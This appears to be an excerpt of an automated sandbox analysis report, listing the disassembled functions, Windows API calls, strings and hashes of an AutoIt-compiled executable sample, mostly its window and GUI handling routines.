SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00668AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00668AD2
CharNextW.USER32(0000014E), ref: 00668B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00668B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00668B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00668B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00668B86
SetWindowTextW.USER32(?,0000014E), ref: 00668BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00668BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00668C1F
_memset.LIBCMT ref: 00668C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00668C8D
_memset.LIBCMT ref: 00668CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00668D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00668D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00668E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00668E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00668E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00668EB4
DrawMenuBar.USER32(?), ref: 00668EC3
SetWindowTextW.USER32(?,0000014E), ref: 00668EEB

Strings

0, xrefs: 00668E55

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 1b957715ad9967b98a5d8b960e342e48487e63e4f0359883f45ca74c5aa8dc60
Instruction ID: b270e543a21fd96573152f7b972b2dfaa6ca5b52ba7a2134ea12a499e9a85b88
Opcode Fuzzy Hash: 1b957715ad9967b98a5d8b960e342e48487e63e4f0359883f45ca74c5aa8dc60
Instruction Fuzzy Hash: 82E17271904219AFDF20DF64CC84EEE7BBAEF09750F10825AF915AB291DB709981DF60

Function 0066488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006649CA
GetDesktopWindow.USER32 ref: 006649DF
GetWindowRect.USER32(00000000), ref: 006649E6
GetWindowLongW.USER32(?,000000F0), ref: 00664A48
DestroyWindow.USER32(?), ref: 00664A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00664A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00664ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00664AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00664AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00664B09
IsWindowVisible.USER32(?), ref: 00664B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00664B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00664B58
GetWindowRect.USER32(?,?), ref: 00664B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00664B96
GetMonitorInfoW.USER32(00000000,?), ref: 00664BB0
CopyRect.USER32(?,?), ref: 00664BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00664C32

Strings

tooltips_class32, xrefs: 00664A96
0, xrefs: 00664975
(, xrefs: 00664BA3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 18a129d6a87b1963ea31c74a298f150c4c934f74e84e56e5e88adba34f1816e1
Instruction ID: fa97b7e738bb7eb231cec3eae312504052a1ca8cbae766c759ae8c0bfe6ad2df
Opcode Fuzzy Hash: 18a129d6a87b1963ea31c74a298f150c4c934f74e84e56e5e88adba34f1816e1
Instruction Fuzzy Hash: 43B19E71608341AFDB04DF65D848B6ABBE6FF84314F008A1CF5999B2A1DB71EC05CB95

Function 0064449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006444AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006444D2
_wcscpy.LIBCMT ref: 00644500
_wcscmp.LIBCMT ref: 0064450B
_wcscat.LIBCMT ref: 00644521
_wcsstr.LIBCMT ref: 0064452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00644548
_wcscat.LIBCMT ref: 00644591
_wcscat.LIBCMT ref: 00644598
_wcsncpy.LIBCMT ref: 006445C3

Strings

%u.%u.%u.%u, xrefs: 00644626
StringFileInfo\, xrefs: 0064451B
\VarFileInfo\Translation, xrefs: 00644540
DefaultLangCodepage, xrefs: 006445AB
04090000, xrefs: 0064457E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 3bb2eab74ef2ffe52032284d2f2ffca3f134a5f359f9772ab78203f74003c125
Instruction ID: 3760ee2a1d27101ae5c8daa3188dd481a10f039b2efcf1f0f2d8d9e8b11d1e7b
Opcode Fuzzy Hash: 3bb2eab74ef2ffe52032284d2f2ffca3f134a5f359f9772ab78203f74003c125
Instruction Fuzzy Hash: EB41F771580205BBEB58AB74DC47FBF776EDF42710F10006EF905E61C2EE74AA0196A9

Function 005E27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E28BC
GetSystemMetrics.USER32(00000007), ref: 005E28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E28EF
GetSystemMetrics.USER32(00000008), ref: 005E28F7
GetSystemMetrics.USER32(00000004), ref: 005E291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005E2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005E2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005E297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005E2990
GetClientRect.USER32(00000000,000000FF), ref: 005E29AE
GetStockObject.GDI32(00000011), ref: 005E29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 005E29D5

Part of subcall function 005E2344: GetCursorPos.USER32(?), ref: 005E2357
Part of subcall function 005E2344: ScreenToClient.USER32(006A57B0,?), ref: 005E2374
Part of subcall function 005E2344: GetAsyncKeyState.USER32(00000001), ref: 005E2399
Part of subcall function 005E2344: GetAsyncKeyState.USER32(00000002), ref: 005E23A7

SetTimer.USER32(00000000,00000000,00000028,005E1256), ref: 005E29FC

Strings

AutoIt v3 GUI, xrefs: 005E2974

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 56fd5c4efd8318cad2193338b738b7af40d2814407860f7f458ad26888742b66
Instruction ID: d861d46b0fe759b0041be59f1e6af377add2fa8f4d73453635ff10fabbdd3976
Opcode Fuzzy Hash: 56fd5c4efd8318cad2193338b738b7af40d2814407860f7f458ad26888742b66
Instruction Fuzzy Hash: 9AB16C71A4024AEFDB14DFA9DC45BED7BBAFB48310F105129FA56E62A0DB74A840CF50

Function 0063A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0063A47A
__swprintf.LIBCMT ref: 0063A51B
_wcscmp.LIBCMT ref: 0063A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0063A583
_wcscmp.LIBCMT ref: 0063A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0063A5F6
GetDlgCtrlID.USER32(?), ref: 0063A648
GetWindowRect.USER32(?,?), ref: 0063A67E
GetParent.USER32(?), ref: 0063A69C
ScreenToClient.USER32(00000000), ref: 0063A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0063A71D
_wcscmp.LIBCMT ref: 0063A731
GetWindowTextW.USER32(?,?,00000400), ref: 0063A757
_wcscmp.LIBCMT ref: 0063A76B

Part of subcall function 0060362C: _iswctype.LIBCMT ref: 00603634

Strings

%s%u, xrefs: 0063A515

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: ffd238e8f91d31800ccdb07a7b818d3d63dc985f528d46261279e390b5ab2402
Instruction ID: 9d60f1eb09587366b22f297e612b4452d4c17f97f0799ba4cfc1061f48cce14f
Opcode Fuzzy Hash: ffd238e8f91d31800ccdb07a7b818d3d63dc985f528d46261279e390b5ab2402
Instruction Fuzzy Hash: 07A1B235204606AFD719DFA4C888BEAB7EAFF44315F004629F9D9C2290DB30E955DBD2

Function 0063AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0063AF18
_wcscmp.LIBCMT ref: 0063AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0063AF51
CharUpperBuffW.USER32(?,00000000), ref: 0063AF6E
_wcscmp.LIBCMT ref: 0063AF8C
_wcsstr.LIBCMT ref: 0063AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0063AFD5
_wcscmp.LIBCMT ref: 0063AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0063B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0063B055
_wcscmp.LIBCMT ref: 0063B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0063B08D
GetWindowRect.USER32(00000004,?), ref: 0063B0F6

Strings

@, xrefs: 0063AEF9
ThumbnailClass, xrefs: 0063AFE0, 0063B060

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f323ec4cfe511a97bfea9a5aff8f9f8d708633589980b309ca99872b90e6b545
Instruction ID: e707b0adb24f519d1abbab59da13261a5efcb364888b884ef054f879f9d4ff7a
Opcode Fuzzy Hash: f323ec4cfe511a97bfea9a5aff8f9f8d708633589980b309ca99872b90e6b545
Instruction Fuzzy Hash: 0981A1711082059BDB05DF10C885FAA7BEAFF84314F04946EFE858A1A1DB74DD45CBE2

Function 0066C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

DragQueryPoint.SHELL32(?,?), ref: 0066C627

Part of subcall function 0066AB37: ClientToScreen.USER32(?,?), ref: 0066AB60
Part of subcall function 0066AB37: GetWindowRect.USER32(?,?), ref: 0066ABD6
Part of subcall function 0066AB37: PtInRect.USER32(?,?,0066C014), ref: 0066ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0066C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0066C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0066C6BE
_wcscat.LIBCMT ref: 0066C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0066C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0066C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0066C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0066C757
DragFinish.SHELL32(?), ref: 0066C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0066C851

Strings

@GUI_DROPID, xrefs: 0066C77E
@GUI_DRAGID, xrefs: 0066C7C9
@GUI_DRAGFILE, xrefs: 0066C800
pbj, xrefs: 0066C79B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbj
API String ID: 169749273-877451871
Opcode ID: 8505687679b4bec32055775b5988727c1570e2da31544188279994950344ad82
Instruction ID: 0cde86422c95494699c6d9bd4f3bf47133348cd29df7bdd1f02475fd8d487156
Opcode Fuzzy Hash: 8505687679b4bec32055775b5988727c1570e2da31544188279994950344ad82
Instruction Fuzzy Hash: 6E616B71108341AFC705EF65DC89DAFBBEAFF89750F00092EF5A5921A1DB709909CB52

Function 0063ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0063AC33

Strings

LAST, xrefs: 0063ABF8
ACTIVE, xrefs: 0063AC0E
[CLASS:, xrefs: 0063AC83
[REGEXPTITLE:, xrefs: 0063AC5B
[HANDLE:, xrefs: 0063AC3F
[LAST, xrefs: 0063ACE0
HANDLE=, xrefs: 0063AC2C
ALL, xrefs: 0063ACC7
REGEXP=, xrefs: 0063AC48
[ALL, xrefs: 0063ACD9
[ACTIVE, xrefs: 0063AC20
CLASSNAME=, xrefs: 0063AC70

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: b3feb2d8d3df09c5ed4344f3c07b395845a5b4553546a878c0a897a53a25de38
Instruction ID: 9b3aa37d7402b804b6847e61110bb43884f66ef442596dd3faff8e6176547cbd
Opcode Fuzzy Hash: b3feb2d8d3df09c5ed4344f3c07b395845a5b4553546a878c0a897a53a25de38
Instruction Fuzzy Hash: D131A33198820AA6DE18FB91DE07EEF7B6AAF10711F200419F482715D1FF516F04D69A

Function 00654FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00655013
LoadCursorW.USER32(00000000,00007F00), ref: 0065501E
LoadCursorW.USER32(00000000,00007F03), ref: 00655029
LoadCursorW.USER32(00000000,00007F8B), ref: 00655034
LoadCursorW.USER32(00000000,00007F01), ref: 0065503F
LoadCursorW.USER32(00000000,00007F81), ref: 0065504A
LoadCursorW.USER32(00000000,00007F88), ref: 00655055
LoadCursorW.USER32(00000000,00007F80), ref: 00655060
LoadCursorW.USER32(00000000,00007F86), ref: 0065506B
LoadCursorW.USER32(00000000,00007F83), ref: 00655076
LoadCursorW.USER32(00000000,00007F85), ref: 00655081
LoadCursorW.USER32(00000000,00007F82), ref: 0065508C
LoadCursorW.USER32(00000000,00007F84), ref: 00655097
LoadCursorW.USER32(00000000,00007F04), ref: 006550A2
LoadCursorW.USER32(00000000,00007F02), ref: 006550AD
LoadCursorW.USER32(00000000,00007F89), ref: 006550B8
GetCursorInfo.USER32(?), ref: 006550C8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 464e23b3c41df95d50ab2e59966a581d4286353d545383a7866a6a2c4125a077
Instruction ID: 8ca6f6e70c49a987f060de85f96bdf81d06b35eb79c649acb9589da5d985d64c
Opcode Fuzzy Hash: 464e23b3c41df95d50ab2e59966a581d4286353d545383a7866a6a2c4125a077
Instruction Fuzzy Hash: 543115B1D0831A6ADF109FB68C899AFBFE9FF04750F50452AE50DE7280DA78A5058F91

Function 0066A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0066A259
DestroyWindow.USER32(?,?), ref: 0066A2D3

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0066A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0066A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066A382
DestroyWindow.USER32(00000000), ref: 0066A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005E0000,00000000), ref: 0066A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066A3F4
GetDesktopWindow.USER32 ref: 0066A40D
GetWindowRect.USER32(00000000), ref: 0066A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0066A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0066A444

Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC

Strings

tooltips_class32, xrefs: 0066A346, 0066A3D4
0, xrefs: 0066A26F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: cb46df8763518f32d2c17b6e589df954e2ca3a71b662e86f66b6aceb9a093d71
Instruction ID: 904e926d304a39fd14f0d1e5aa98207f17d8dc968bd89c0ba976c42fb96f3d15
Opcode Fuzzy Hash: cb46df8763518f32d2c17b6e589df954e2ca3a71b662e86f66b6aceb9a093d71
Instruction Fuzzy Hash: 86718A70140205AFD725DF68CC48FAA7BEAFB89700F04451DF986A72A1DBB5A902CF52

Function 00664392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00664424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0066446F

Strings

ISCHECKED, xrefs: 006645F2
GETTEXT, xrefs: 006645C2
UNCHECK, xrefs: 0066464B
GETITEMCOUNT, xrefs: 00664551
EXPAND, xrefs: 00664521
GETTOTALCOUNT, xrefs: 00664456
COLLAPSE, xrefs: 006644B5
EXISTS, xrefs: 006644D8
CHECK, xrefs: 0066448F
GETSELECTED, xrefs: 0066457F
SELECT, xrefs: 00664620

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 7f51cf0b5cea86e37a9928d55fdc5d42678fd9ea74f0be5245ba99606751630a
Instruction ID: 2d545cf89eba0058954e2951cca64c13d6d6771a4081e3c331da3e8cbacca02e
Opcode Fuzzy Hash: 7f51cf0b5cea86e37a9928d55fdc5d42678fd9ea74f0be5245ba99606751630a
Instruction Fuzzy Hash: 68915A702043419FCB08EF20C455A6EBBE6AF95350F04886CF8965B7A2DF31ED4ACB95

Function 0066B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0066B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006691C2), ref: 0066B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0066B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066B9C3
FreeLibrary.KERNEL32(?), ref: 0066B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066B9DF
DestroyIcon.USER32(?,?,?,?,?,006691C2), ref: 0066B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0066BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0066BA17

Part of subcall function 00602EFD: __wcsicmp_l.LIBCMT ref: 00602F86

Strings

.dll, xrefs: 0066B86D
.icl, xrefs: 0066B82A
.exe, xrefs: 0066B84A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 2b5df017507963280a117f0e1c5c415146272db5100320992aa86ebd4a15a7a7
Instruction ID: 13790056465b684fd67cfccac0664c5313c0cbb49801fcfb7735691155e84a70
Opcode Fuzzy Hash: 2b5df017507963280a117f0e1c5c415146272db5100320992aa86ebd4a15a7a7
Instruction Fuzzy Hash: DD61ED71980209FAEB18DF64DC45BBE7BAEFF09710F10421AFA11D61D0DBB49981DBA0

Function 0064A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

CharLowerBuffW.USER32(?,?), ref: 0064A3CB
GetDriveTypeW.KERNEL32 ref: 0064A418
